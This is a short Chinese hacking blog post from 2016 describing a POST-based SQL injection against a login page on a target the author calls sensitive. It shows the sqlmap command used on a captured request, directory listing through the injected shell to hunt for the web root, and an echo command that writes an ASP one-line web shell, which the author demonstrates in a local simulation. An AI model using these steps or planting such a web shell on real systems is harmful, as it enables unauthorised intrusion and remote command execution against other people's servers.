post注入及提权思路

我们这次的目标有点敏感  性感的马赛克是必须有的

登陆表单 那么我们来看看是不是存在post注入

Setp1:设置代理

   

Step2:账户admin密码随意 提交上去  抓个包

   

把抓到的包复制到本地的一个文本里

   

   

Sqlmap走起

Sqlmap -r "/tmp/binghe" --batch

   

很幸运的

   

后来知道是内网,想连上服务器得拿到shell转发啊

   

怎么拿  先来列磁盘

   

dir c:\   ok

   

Dir d:\  ok

   

Dir e:\ 没有

   

.....

   

dir 列了CD盘都没有列到类似的web目录

   

后来逐个目录列了半个多小时无果

   

操蛋  喝了杯82年的乐事休息下

   

   

Duang 的一下  有了!

   

C磁盘搜索

   

但是搜索什么?

   

 我在那个登陆页面查看源码找到了一个js文件  访问确实存在

   

名为jquery.history.js

执行dir/s/b c:\jquery.history.js C盘内搜索名为jquery.history.js的文件并返回其路径

但是童话里都是骗人的。。。

   

说明这台机器上并不存在本文件

这说明了什么?

今天遇到两次??Real is fuck the dog! 真是日了狗了

   

这里权且不说,我们讲的是个思路  我们来本地模拟一下

   

获得网站根目录

   

c:\binghesec\web\

   

然后

   

echo "<%eval request("pass")%>">c:\binghesec\web\binghesec.asp

   

   

你是不是想问一句话两边带个双引号会影响执行吗? 你试试不就知道了!!!

有大牛说,找不到根目录没关系,咱可以cmd下建虚拟目录嘛。。。目录你妹啊,你看哪个方便!但是思路确实是可行的,就是麻烦了点。

posted @ 2016-01-23 17:47  h4ck0ne  阅读(256)  评论(0编辑  收藏  举报